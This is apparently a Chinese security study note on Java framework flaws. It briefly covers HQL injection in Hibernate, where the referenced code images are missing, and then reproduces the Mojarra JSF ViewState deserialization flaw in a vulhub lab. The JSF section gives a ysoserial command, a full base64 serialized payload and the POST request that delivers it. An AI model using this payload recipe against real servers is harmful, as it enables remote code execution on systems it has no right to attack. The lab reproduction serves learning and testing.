Hibernate框架漏洞
Hibernate框架中的HQL注入漏洞
Hibernate是一种ORMapping框架,内部可以使用原生SQL还有HQL语言进行SQL操作。
所谓的HQL注入,就是指在Hibernate中没有对数据进行有效的验证导致恶意数据进入应用程序中造成的。
请看这段代码:
Input参数即可造成注入。
不过在Hibernate中,一般都是在createQuery中使用PDO,使用setString填充占位符进行sql语句的拼接,如果是这样的话,自然就不存在SQL注入,但是不排除有人像上面的图片中的写法。
正常情况下:
Sqlin参数存在注入漏洞,于是:
由于Hibernate的HQL中,大多数情况下不支持union,更不支持数据库的meta data的查询,所以如何弄清楚实体名称和列名称才能继续提取有用的数据,遗憾的是,没有找到一种方法爆出当前的列名。
看了http://blog.h3xstream.com/2014/02/hql-for-pentesters.html, 上面说提交一个不存在的列名即可,但是本地测试没有成功,目测是try-catch了事物提交,然后e.getSql()方法。
比如,源码中进行错误处理,输出了e.getSQL()以及e.getXSQLException(),结果就一样了:
JSF框架漏洞
JSF ViewState 反序列化漏洞
漏洞描述
JavaServer Faces (JSF) 是一种用于构建 Web 应用程序的标准,Mojarra是一个实现了JSF的框架。在其2.1.29-08、2.0.11-04版本之前,没有对JSF中的ViewState进行加密,进而导致攻击者可以构造恶意的序列化ViewState对象对服务器进行攻击。
影响范围
2.1.29-08前
2.0.11-04前
复现过程
这里使用2.1.28版本
使用vulhub
/app/vulhub-master/mojarra/jsf-viewstate-deserialization
1
使用docker启动
docker-compose build
docker-compose up -d
1
2
环境启动后,访问
http://192.168.239.129:8080
1
使用yso生成payload
java -jar ysoserial-master-SNAPSHOT.jar Jdk7u21 "touch /tmp/JSF" | gzip | base64 -w 0
1
生成的paylload
H4sIAAAAAAAAA61Wy28bRRj/xk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI+mPF6Ym+73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw+GZ3E0dJqN3SlXZn9nvN933zm2++zV+h3rag6ypdo5LDVU1Kq/o1VrhI7VKG8R+079+++WioNwTgWtBakQr4d+fev/nRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe/rm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s/m4689IbPmngBz5+P7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r/6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ+vZZrXkNKWNhQ0S9E4/gfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK+P+q7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt+XYw/Jn/7wyB+OuuwkxBs6PQT+DTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS+B8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa/AqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB/oG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY+OTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE+BVXkowjwbF+6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt+KYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo+5jdtIzO+Qz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV/BmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU+tNdf0X9bep8oXu53NThecNY8/NdLLqzYRatdSMgwSO12AKQ69AfTF/lSn/fearndsn4pjUjuOpXThu8/gHvG/7jt3tFLtrcqjDM2WZ6wRc+z0PE0eE/66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl+//0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm+Y2Oe17ukBveV3NbSoUh99eO/rzne+xaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6/wIGxTWyiAsAAA==
1
在进行URL编码
H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D
1
然后首页,提交表单,修改其中javax.faces.ViewState字段的值为上述Payload
POST /index.xhtml HTTP/1.1
Host: 192.168.239.129:8080
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:52.0) Gecko/20100101 Firefox/52.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://192.168.239.129:8080/
DNT: 1
Connection: close
Upgrade-Insecure-Requests: 1
Content-Type: application/x-www-form-urlencoded
Content-Length: 1923
j_idt6=j_idt6&j_idt6%3Aj_idt7=aaaa&j_idt6%3Aj_idt8=Hello&javax.faces.ViewState=H4sIAAAAAAAAA61Wy28bRRj%2fxk5sxzjP5tlHmtKWPKC7zbMpjmjzIK2LQyKcphI%2bmPF6Ym%2b73t3uziYbJHrjD0ConLkAB8KhF1r1gFRxa7kgIYGKKsGFG3CokLjw%2bGZ3E0dJqN3SlXZn9nvN933zm2%2b%2bzV%2bh3rag6ypdo5LDVU1Kq%2fo1VrhI7VKG8R%2b079%2b%2b%2bWioNwTgWtBakQr4d%2bfev%2fnRndtjYeSb6wkAaDl3HsQTQquvKkZZsh1dMqyiRE2qlJjkUo3qkqpzZulUk1xb44rELepKy6xsapQzO4Vjw5XFe%2frm56NhiKSgMafqBabzN51ynlkpaMqhgm5rjKeQ7mYhnstvcKYYBWZzCGezM1mI5BSN2vjblk0Lt2VctijPCloyDfU5nZYZMnfwMtxS9SIyW3OGw02HL1mGySyuCqOdvqCIXa7Qk64pYv0HH8fyFn7jr56OYvHHMyJhghdCeig7s%2fm4689IbPmngBz5%2bP7fd79C9gicjUMYXozCmSicjMJLBFpsZqlUW2GWrRr65dQcAXKJQOOsoduc6nyFag6r%2f6Lvw8cfPPr9NQKRKVVXOU7CA4MrBOpmMQsEmnEbmZ%2bvZZrXkNKWNhQ0S9E4%2fgfEOl5SbQIHMtzJLwc5XaIbmkELBBIpXWeWlzKGQuPpDdvwnZNNX8b2E3KBFoqM2yf2sZIk0OBt1qphlQlYA2nEhIyYkBETso8J2cOEvIUJ2cOEPLe4kMzuK13WKrK%2bP%2bq7zJIzwZRyzNtFqhc0ZiVFSmIFQ3HKiB8Cp55qeVQt%2bXYw%2fJn%2f7wyB%2bOuuwkxBs6PQT%2bDTp8tHVQ8KvCzPLS9Mu6qdQhLlhlVdqaYcqoE5gYNn8YJANMglgennkcmM4VgKm1cFjBMBAiVxSBMQhxeiMEBg9BkAS%2bB8rTtiOTpXy0yeztsIcYVvWSLQ7hUL1ag47522s7Va3rK0jRYCR6vEgls0pWhBKWitVLW3fCejMIQ5Q8Hgn0DHwGB6j1gyAa%2fAqTi8DBKBJm44SqlP5mVTvpSZj8FpLBjMZQqB%2foG9hXOnOSyRCsNKm8AKNyrMjWEFy3CqXFugZlB7DlciWlrHQjM6OTo8PD46PDY%2bOTFCoDf9JH4SjkEIKyd6hO9BqIcIjlFRcSHm0RAE%2bBVXkowjwbF%2b6DaQW55II34jHlGGJvwmfAFohkkcsSBCO0oJ5XP4hgVtt%2bKYp9jnMwNFMeuATo9PoAu6UaMH576PwuyhwGzKo%2b5jdtIzO%2bQz9zV7GI6ghpj1wlFcvrJADAa3gz6BHCHV%2fBmESfoOyG3DX8L4lVue4oQXFBESfd76x6AVxziyQnAcWqDBuQ430BaQ77ZvqkPipuqIQlcUuqPQU%2btNdf0X9bep8oXu53NThecNY8%2fNdLLqzYRatdSMgwSO12AKQ69AfTF%2flSn%2ffearndsn4pjUjuOpXThu8%2fgHvG%2f7jt3tFLtrcqjDM2WZ6wRc%2bz0PE0eE%2f66EZVjavrArPZm71SOKmCWLrWoYtITH3N34uf9h3zctsw9CQNJAShy3o5KdQFJO6Wu4qTtLuGtihzgiusMta1TXDe7JSNPb0z2Kl%2b%2f%2f0dzx4MYnIQilIVFmAjge0rBLa97RpWGhwV6ujm%2bY2Oe17ukBveV3NbSoUh99eO%2frzne%2bxaMxD3GxXfNY2Q1sOht4yWJ2ydAKrhn0uIn1mOh4Rfo4xFbH6TidOD0pTk7MXbOqZBQqj2u6%2fwIGxTWyiAsAAA%3D%3D